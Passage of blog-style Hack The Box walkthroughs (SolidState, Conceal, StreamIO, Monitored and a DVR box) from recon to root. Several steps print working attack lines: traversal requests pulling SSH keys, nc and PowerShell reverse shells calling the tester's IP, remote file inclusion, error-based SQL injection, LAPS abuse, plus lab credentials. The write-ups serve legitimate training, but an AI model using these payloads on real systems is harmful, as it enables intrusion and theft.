PORT      STATE SERVICE       REASON  VERSION
22/tcp    open  ssh           syn-ack Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5040/tcp  open  unknown       syn-ack
7680/tcp  open  pando-pub?    syn-ack
8080/tcp  open  http-proxy    syn-ack
|_http-title: Argus Surveillance DVR
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
|_http-favicon: Unknown favicon MD5: 283B772C1C2427B56FC3296B0AF42F7C
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Connection: Keep-Alive
|     Keep-Alive: timeout=15, max=4
|     Content-Type: text/html
|     Content-Length: 985
|     <HTML>
|     <HEAD>
|     <TITLE>
|     Argus Surveillance DVR
|     </TITLE>
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
|     <frameset frameborder="no" border="0" rows="75,*,88">
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0"> 
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0"> 
|     <noframes>
|     <p>This page uses frames, but your browser doesn't support them.</p>
|_    </noframes>
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC

445/TCP - SMB

8080/TCP - HTTP

I look up exploits matching the service:

I actually get quite a lot of them, let's try out the Directory Traversal one.

# PoC

curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

We indeed get the intended result.

Back on the website we find the user we're looking for:

We want to get the ssh key of viewer so we can then log in.

curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

Now that we have the id_rsa key, we can use it to log into SSH.

Foothold

EZ PZ

Let's check out the home directory:

We notice the user already has nc.exe as well as psexec.exe in here... Might be a clue.

Let's snatch the local.txt first.

local.txt

Privilege Escalation

PoC

We also find another PoC:

In here we see a mention of the .ini file, let's check it out.

ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

Notice the Unknown character here.

:::note It is possible that we might have to brute force the last character if this is the correct password. :::

14WatchD0g

ImWatchingYou

:::fail Neither worked. :::

Let's try the nc.exe binary then, with the help of runas.

:::fail Again no success, let's try to brute force the last Unknown character that we found previously. :::

After some tries it worked:

:::note The correct password was 14WatchD0g$ :::

proof.txt

HTB-SolidState

Maxim Andrei Koltypin — Sun, 16 Mar 2025 00:00:00 GMT

Scope:
10.10.10.51

Recon

Nmap

sudo nmap solid -p- -sC -sV -sT -T5 -vvvv --min-rate 5000 --reason

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp        syn-ack JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello solid (10.10.16.3 [10.10.16.3])
80/tcp   open  http        syn-ack Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
110/tcp  open  pop3        syn-ack JAMES pop3d 2.3.2
119/tcp  open  nntp        syn-ack JAMES nntpd (posting ok)
4555/tcp open  james-admin syn-ack JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I also tried 161 UDP for good measure:

sudo nmap solid -p161 -sC -sV -sU -T5 -vvvv --min-rate 5000 --reason

Host is up, received echo-reply ttl 63 (0.086s latency).
Scanned at 2025-03-16 08:09:29 CET for 1s

PORT    STATE  SERVICE REASON              VERSION
161/udp closed snmp    port-unreach ttl 63

Right away I notice the JAMES Remote Admin 2.3.2 service which I look up:

Good to know! Let's enumerate the rest first.

25/TCP - SMTP

Relay attack isn't possible.

After some minutes of scanning I didn't find any names, moving on.

80/TCP - HTTP

This was about the most useful I could find in a quick skim. Let's run feroxbuster and enumerate the web server.

Just some static assets, moving on.

110/TCP - POP3

We don't have any user info so we can't do anything here yet.

119/TCP - NNTP

Unknown what this port does atm, but I think it's linked to the next port.

4555/TCP - James-Admin

The PoC we previously found in [[#Nmap]] gave us some interesting info:

It appears the default creds are root:root, let's try it out:

Well it appears someone didn't change the default creds, good for us.

I went ahead and added these to a user list, in case I want to spray later on:

It seemed to be sort of a dead end though:

Let's instead download over the PoC and run that in order to get RCE.

PoC

Unfortunately it wouldn't fire:

However when we check the service via nc we now see the following:

This means the exploit tried to add a new user.

:::note I also tried the older version but that didnt work either for RCE. :::

What we can do instead is just change passwords of the users since we're an admin account.

Awesome, we were able to find the creds.

mindy
P@55W0rd1!2@

Foothold

Upon login we notice that the previously set up exploit now fires:

Not to worry, couple of enter further we are down to the normal SSH shell.

user.txt

Due to the presence of the .rhosts file it appears that the server is running r-services, however we can't view the file since it is owned by root.

Enumeration

I tried to enumerate the system but it wouldn't give:

Let's try another approach, since we're in this jail I remembered that just now the script would indeed launch upon making the ssh connection. Meaning that the reverse shell HIGHLY LIKELY will execute if we retry it with a listener.

Just as imagined, we indeed receive a reverse shell, let's see if we can do some more commands with this one.

It appears that this shell is way more interactive, let's continue our approach.

I downloaded over pspy32:

I let it run for a bit and checked back.

After a few minutes I noticed that root had a script running:

I bet we can change this up in order to get ourselves a root shell.

Sure can! Let's go ahead and change it up.

Privilege Escalation

echo "
#!/usr/bin/env python
import os
import sys
os.system('/bin/nc -e /bin/bash 10.10.16.3 81')
" > /opt/tmp.py

After a few minutes of waiting:

Hell yeah.

root.txt

HTB-Conceal

Maxim Andrei Koltypin — Sat, 22 Mar 2025 00:00:00 GMT

Scope:
10.10.10.116

Recon

Nmap

The nmap scan wouldn't show any ports:

Eventhough the ping command worked:

I figured the firewall settings might be blocking our scans.

This time the port 80 returned as filtered. Before wasting more time on this though, I decided to scan UDP ports first.

sudo nmap -sC -sV -F conceal -sU -T5 --min-rate=5000 -Pn -vvvv

Right away I notice the following:

This then took a while to scan

Finally the results came in:

PORT    STATE SERVICE REASON
161/udp open  snmp    udp-response ttl 127
| snmp-win32-software: 
|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2021-03-17T15:16:36
|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2021-03-17T15:16:36
|_  VMware Tools; 2021-03-17T15:16:36
| snmp-sysdescr: Hardware: AMD64 Family 25 Model 1 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 37m49.28s (226928 timeticks)
| snmp-netstat: 
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  0.0.0.0:49665        0.0.0.0:0
|   TCP  0.0.0.0:49666        0.0.0.0:0
|   TCP  0.0.0.0:49667        0.0.0.0:0
|   TCP  0.0.0.0:49668        0.0.0.0:0
|   TCP  0.0.0.0:49669        0.0.0.0:0
|   TCP  0.0.0.0:49670        0.0.0.0:0
|   TCP  10.10.10.116:139     0.0.0.0:0
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:500          *:*
|   UDP  0.0.0.0:4500         *:*
|   UDP  0.0.0.0:5050         *:*
|   UDP  0.0.0.0:5353         *:*
|   UDP  0.0.0.0:5355         *:*
|   UDP  0.0.0.0:61432        *:*
|   UDP  10.10.10.116:137     *:*
|   UDP  10.10.10.116:138     *:*
|   UDP  10.10.10.116:1900    *:*
|   UDP  10.10.10.116:51122   *:*
|   UDP  127.0.0.1:1900       *:*
|_  UDP  127.0.0.1:51123      *:*
| snmp-win32-users: 
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
500/udp open  isakmp  udp-response ttl 127
| ike-version: 
|   vendor_id: Microsoft Windows 8
|   attributes: 
|     MS NT5 ISAKMPOAKLEY
|     RFC 3947 NAT-T
|     draft-ietf-ipsec-nat-t-ike-02\n
|     IKE FRAGMENTATION
|     MS-Negotiation Discovery Capable
|_    IKE CGA version 1
Service Info: OS: Windows 8; CPE: cpe:/o:microsoft:windows:8, cpe:/o:microsoft:windows

We notice that snmp even displays netstat for us with multiple tcp ports visible! Other than that we've also found the 500 port to be open with the isakmp service, which I haven't found before.

161/UDP - SNMP

I brute forced the community string using onesixtyone:

And then went on with snmpwalk:

We find some sort of IKE VPN password, supposedly for the service on port 500?

9C8B1A372B1878851BE2C097031B6E43

The string under it appears to be a name maybe? Let's try cracking the found hash:

Nice!

Conceal
Dudecake1!

500/UDP - ISAKMP

I proceded to check out what this service even was in the first place.

To find out more on how to test this service I will use hacktricks:

I tried it out myself:

This matches our situation.

Connecting to IPSEC VPN

In order to actually connect we will now have to edit the /etc/ipsec.conf and /etc/ipsec.secrets files and then start up the vpn.

Now that we have edited these 2 we can go ahead and start up the vpn in order to set up the connection.

If all went accordingly we should see the following result:

Now I reran nmap again and finally started seeing results:

Nmap - Post VPN

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24024/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 10757/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 61491/udp): CLEAN (Timeout)
|   Check 4 (port 14517/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-03-22T10:22:01
|_  start_date: 2025-03-22T08:36:30

21/TCP - FTP

Luckily for us port 21 has anon login, let's check it out.

But it appears to be empty...

445/TCP - SMB

No luck.

Password spraying didn't yield anything either:

139/TCP - RPCclient

No luck.

80/TCP - HTTP

I started up feroxbuster and let it enumerate the directories, while this took a super long time I found an endpoint and checked it out right away:

Seems like some sort of upload page, however there's nothing on here.

No further endpoints were found.

At this point I figured we could use the ftp server to upload a reverse shell which we could then initiate from the /upload endpoint.

Indeed we can upload files!

Webshell

I then went ahead and tested whether I could find the files on the /upload endpoint:

Let's try uploading a webshell.

We also get the physical path:

I then went on and created a cmd.asp shell:

I can now try and issue commands via the webshell:

Foothold

I will now copy the Invoke-PowerShellTcp.ps1 shell by Nishang:

curl http://conceal/upload/cmd.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.16.2/Invoke-PowerShellTcp.ps1%27)

It worked, hell yeah.

Privs

Makes sense since we're the service user for running the webserver.

This HIGHLY LIKELY means that priv esc will at least be a bit easier.

user.txt

Privilege Escalation

I downloaded over SweetPotato.exe and ran it:

./sweet.exe -e PrintSpoofer -p nc.exe -a "10.10.16.2 443 -e cmd"

proof.txt

Finished 19:27 22-03-2025

HTB-StreamIO

Maxim Andrei Koltypin — Wed, 26 Mar 2025 00:00:00 GMT

Scope:
10.10.11.158

Recon

Nmap

sudo nmap -sC -sV -p- streamio -sT -T5 --min-rate=5000 -Pn -vvvv

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-03-26 20:47:51Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2025-03-26T20:49:22+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Issuer: commonName=streamIO/countryName=EU
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49705/tcp open  msrpc         syn-ack Microsoft Windows RPC

I also checked for UDP ports, specifically 161 but got the following result:

sudo nmap -sC -sV -p161 streamio -sU -T5 --min-rate=5000 -Pn -vvvv

PORT    STATE         SERVICE REASON      VERSION
161/udp open|filtered snmp    no-response

Time to start analyzing what we've got.

This appears to be a Windows machine with a few ports open.

445/TCP - SMB

80/TCP - HTTP

Feroxbuster

Nothing out of the ordinary

443/TCP - HTTPS

Feroxbuster

Couple of interesting things but let's check out the certificate, since we're dealing with a domain server.

I notice the watch.streamIO.htb subdomain, which I add to my /etc/hosts list. I then go ahead and look up the website:

And below is the watch.streamio.htb subdomain:

Gobuster

I went ahead and ran a gobuster enum as well because I clearly did not receive what I needed:

Here I found the /master.php endpoint, which feroxbuster did not manage to find.

Other than that I didn't really manage to find anything else here. I then decided to enumerate the subdomain:

Here I managed to find the /search.php endpoint.

When clicking on Watch I get this error:

Burpsuite - SQLi

I opened up burp and started playing around with the params, thinking I could maybe get some SQLi action going.

:::note For further testing I had to leverage the [[(My)SQL Injection.pdf]] cheatsheet. :::

Since we're dealing with a Windows machine however, we're HIGHLY LIKELY going to be injecting MSSQL commands.

I started off with ' UNION select 1-- - and then worked up with the amount of columns until I'd get a response:

It seems like the amount of columns is 6, so now we need to modify the UNION query.

I went ahead and inserted the @@version command to check the MSSQL version:

:::note For the following I went over to the website since it wasn't clearly readable on burp. :::

:::important Sidenote: for all the below queries I had to resort to this cheatsheet :::

I then enumerated the databases.

American' UNION select 1,name,3,4,5,6 from master..sysdatabases-- -

Then went on to enumerate the STREAMIO database:

Next up I enumerated the users columns:

Next I enumerated the usernames:

:::caution There was a metric shit ton of them. :::

And now the passwords:

I started cracking them with crackstation:

Now we got a huge list of password spray-able credentials.

Password Spraying

I tried to password spray the creds against either winrm or smb but neither worked unfortunately, so I decided to try out the web server instead using hydra:

We got a valid set of creds!

yoshihide
66boysandgirls..

We can now go ahead and access the /admin panel:

Endpoint Fuzzing - wfuzz

I then went ahead and started fuzzing for other endpoints as I suspected there'd be more (the guided mode told me).

For this I needed the session cookie:

wfuzz -u https://streamio.htb/admin/\?FUZZ\= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: PHPSESSID=kfr3bfkljibfpckvc8lt3sjs7s" --hh 1678

As I quickly found out, there's another param here debug.

:::note I honestly got a bit stuck here and had no clue what to do, then checked a writeup and understood that I should use php wrappers, just as explained in [[9. Common Web App Attacks#9.2.2 - PHP Wrappers]]. :::

Now I got the following output, which I can then use echo base64 -d on.

We get the source code for the master.php page:

<SNIP>

<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>%

We notice the include param on the POST variable.

Remote File Inclusion

Since the source code is talking about including the index.php page we can try and include our own 'page' instead.

I'll create a simple shell.php file:

:::note Since the server is running eval I won't have to use <php?> wrappers. :::

We can then run the following in order to include our file, run it as a POST request, and finally get RCE.

curl --insecure -b "PHPSESSID=kfr3bfkljibfpckvc8lt3sjs7s" -X POST --data "include=http://10.10.16.2/shell.php" https://streamio.htb/admin/index.php\?debug\=master.php

Foothold

Enumeration

After finally getting access I tried to check my privs:

Nothing notable unfortunately, they're not making it easy for us...

Sucks, we can't view any of the directories...

I went back into the C:\inetpub directory and started enumeration from there again

Here I found a few thing:

Which resulted in the following:

:::todo

Enumerate and find the MSSQL db credentials inside the C:\inetpub directory :::

Creds

Since there were way too many files in the web root I used the following command to recursively check through the files:

dir -recurse *.php | select-string -pattern "database"

We get two new user id's, db_user and db_admin. Naturally I'll want to try the admin first.

db_admin
B1@hx31234567890

db_user
B1@hB1@hB1@h

MSSQL

I then tried to use sqlcmd interactively but had no luck:

Instead I could issue commands using the -Q flag:

Afterwards I tried to get the users but got the same ones as previously, so I had to modify my query slightly.

Instead I gave the -d flag with the correct database.

Nice! Let's try and crack em.

We got only 1 new one, the one from nikk37, which is coincidentally one of the users on this target.

Lateral Movement

I can now go ahead and sign in to winrm using the newly found creds.

nikk37
get_dem_girls2@yahoo.com

user.txt

winPEAS

I then uploaded winPEASx64.exe and let it run, where I found the following notable stuff:

Inside this directory I found even more stuff:

I noticed a file called logins.json and checked it out.

{"nextId":5,"logins":[{"id":1,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECG2cZGM1+s+hBAiQvduUzZPkCw==","encryptedPassword":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECKA5q3v2TxvuBBjtXIyW2UjOBvrg700JOU1yfrb0EnMRelw=","guid":"{9867a888-c468-4173-b2f4-329a1ec7fa60}","encType":1,"timeCreated":1645526456872,"timeLastUsed":1645526456872,"timePasswordChanged":1645526456872,"timesUsed":1},{"id":2,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDMUru7zbEb0BAiinvqXr8Trkg==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOXW0KzZftfWBBARYsMPvSrUwx8+QfJdxzT+","guid":"{739bd2a5-5fec-4e08-97d2-3c619bf02be2}","encType":1,"timeCreated":1645526470377,"timeLastUsed":1645526470377,"timePasswordChanged":1645526470377,"timesUsed":1},{"id":3,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPtpFUOBoOFABBDVCjdAdstUxzB6i9DCqvOw","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCocciyfDsthBBDm3YSuhBsW3roo3l3zOUuF","guid":"{a98a87bc-86aa-489c-9227-d6579ab5148b}","encType":1,"timeCreated":1645526484137,"timeLastUsed":1645526484137,"timePasswordChanged":1645526484137,"timesUsed":1},{"id":4,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECB1j+gQdXzIuBAgO0o/N3J2MrQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNt9zddW+/h7BBCBgoQVGaDQjF2IpeQEl/Td","guid":"{2be21548-7c50-42f0-8ef6-b33b1e77f150}","encType":1,"timeCreated":1645526511842,"timeLastUsed":1645526511842,"timePasswordChanged":1645526511842,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

It seemed to hold encrypted usernames and passwords, however I had no clue how to decypher them.

Mozilla Password cracking

I found this tool that would help me crack the passwords:

Then I had to install the pip packages and went ahead and ran it:

We found a new set of creds!

JDgodd
password@12

However I also notice the password for the admin user is some sort of anagram for JDgodd, let's add all these passwords to a list and spray them.

More Password Spraying

Indeed the password for admin is actually for the JDgodd user!

However we cannot login via winrm.

Bloodhound

To fully grasp the AD network I will upload SharpHound.ps1 and execute it, then check out the results in BloodHound.

After ingesting the data we notice that JDGodd is part of the CORE STAFF group. This group has the ReadLAPSPassword permission enabled:

PowerView

Let's upload PowerView.ps1 and import it and get to work.

# Set up credentials
$pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)

# Then add them to the group
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"

Now we can go ahead and use netexec with the --laps option in order to read the LAPSPassword:

We got it! Let's use psexec to log in as admin.

Privilege Escalation

administrator
13IFj++6(7[J]&

EZ PZ.

root.txt

HTB-Monitored

Maxim Andrei Koltypin — Sat, 19 Apr 2025 00:00:00 GMT

Scope:
10.10.11.248

Recon

Nmap

TCP

sudo nmap -sC -sV -p- monitored -sT -T5 --min-rate=5000 -Pn -vvvv

PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp   open  http       syn-ack Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
389/tcp  open  ldap       syn-ack OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   syn-ack Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Nagios XI
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth
| Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth
5667/tcp open  tcpwrapped syn-ack
Service Info: Hosts: nagios.monitored.htb, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP

I then went on to scan UDP ports as well.

sudo nmap -sC -sV -p161 monitored -sU -T5 --min-rate=5000 -Pn -vvvv

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-sysdescr: Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
|_  System uptime: 5m33.13s (33313 timeticks)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 36
|_  snmpEngineTime: 5m33s

Some interesting params popped up as well:

There appears to be a set of creds written down here?

svc
XjH7VCehowpR1xZB

22/TCP - SSH

Tried to go for a quick win, alas:

443/TCP - HTTPS

When clicking Access we get the following page:

I tried logging in with the presumed creds but that didn't work:

However if we enter a different password we get a completely different error message:

Interesting, this means that the creds are HIGHLY LIKELY correct and the account access has been restricted.

For now we can't do anything further, let's enumerate the endpoints.

Feroxbuster

After a LONG while I finally got some luck:

However when going to the page we get the following:

This might call for some burpsuite action.

BurpSuite

Let's change it to POST

I then added the following 2 lines in order to create the POST request:

Content-Type: application/x-www-form-urlencoded

username=svc&password=XjH7VCehowpR1xZB

:::warning The highlighted line is absolutely paramount for success, without it the request will fail! :::

This gives us the following response:

Having received the auth_token we can use this curl request to get access to the backend:

Strange, this might mean that either the auth_token =/= the api-key, or that it is indeed invalid.

I looked up the endpoint to look for more help:

curl -k -L 'https://nagios.monitored.htb/nagiosxi/includes/components/nagioscore/ui/trends.php?createimage&host=localhost&token=72695c532f2fff8b9ddcd6aaaffe2f27b6224650' > image.png

It seemed to work! Looks like we found the correct param being token.

I then had to get a new token because the last one expired:

I used the token to login:

This rerouted me to the following page:

Couple thins to note down are the version running:

Nagios Xi 5.11.0

There seems to be a SQLi vulnerability for this version, let's first check out what else we can find:

We were able to find the API key.

SQLi

Let's move on to the SQLi POC

Trying this out we see the following response:

:::success Error = good! :::

:::note Let's modify our SQLi, since the rest of the POC writeup goes on using SQLmap I will be diverting my course, since I cannot always use SQLmap in the wild (such as OSCP exam). :::

I then started checking for the version of SQL running:

id=1 AND EXTRACTVALUE(1,(SELECT VERSION()))

This seemed to work and displayed the version, meaning our query worked!

:::important Going forward we need to make sure that our query throws an error message, or it will simply not be telling us the outcome of our query i.e. :::

We notice that there's a total of 2 databases, namely information_schema and nagiosxi.

Next step here would be to query the table and columns of the nagiosxi database. To get the full output we can use something like:

id=1 AND EXTRACTVALUE(1,concat(1, (select group_concat(TABLE_NAME, COLUMN_NAME) from information_SCHEMA.COLUMNS where TABLE_SCHEMA = 'nagiosxi')))

However the output only shows the first part since the output is limited:

We can change it up in order to get the individual tables first:

id=1 AND EXTRACTVALUE(1,concat(1, (select TABLE_NAME from information_SCHEMA.COLUMNS where TABLE_SCHEMA = 'nagiosxi' LIMIT 0,1)))

This would be an extraordinary tedious process, but when increasing the number in LIMIT 0,1 it will go on to the next table in the database. To speed things up we can use Intruder inside burpsuite:

Burpsuite - Intruder

We will send our initial request to Intruder and then do the following:

:::warning This will still be an enormously tedious process to check, however as per this ippsec video I learned how to make it a more grep-able output. :::

We will now click on Add and add the following expression and delimiter:

This will make sure that our output starts at the | symbol we used in the concat command, and it will end in the single quote SQL delimiter.

We found the table name that we're looking for, namely xi_users. Now let's modify our Repeater query and get the columns from this table.

Again when we change it to 1,1 we get the following column:

When running this in Intruder we notice that 1,1 returns usernames and 2,1 returns passwords.

Furthermore 7,1 returns us the api_key variable that we so desperately need:

We can now get the juicy stuff, this being the username, password and api_key variables.

id=1 AND EXTRACTVALUE(1,concat(0x7e,(SELECT username from xi_users LIMIT 0,1)))

:::note Since it can't give us full outputs we'll have to improvise by using the SUBSTRING command. :::

id=1 AND EXTRACTVALUE(1,concat(0x7e,(SELECT substring(password,1,28) from xi_users LIMIT 0,1)))

nagiosadmin
$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

I'll try to crack it for good measure.

:::fail Spoiler alert, this wouldn't crack. :::

New Account creation

This time the curl command worked, confirming the correct API key.

After some more snooping online I found the following PoC:

Here I found a POST request that creates a new admin user using the admin API key (the one we just found).

We follow the same data command:

It shows the user has been succesfully created.

l33th4x0r
Password123

Foothold

Shell as Nagios

We can now log out and login again as our newly created user:

We notice the new Admin panel:

However this isn't as interesting for us, instead let's peek at this:

We can create and execute commands from the config manager, let's try and create a reverse shell.

Now we press Save and head on over to the Core Config Manager -> Services tab where we also add a new service.

Just like that we got a revshell.

user.txt

User enum

Before doing any enum I went ahead and made my life easier by using my private key to SSH into the target:

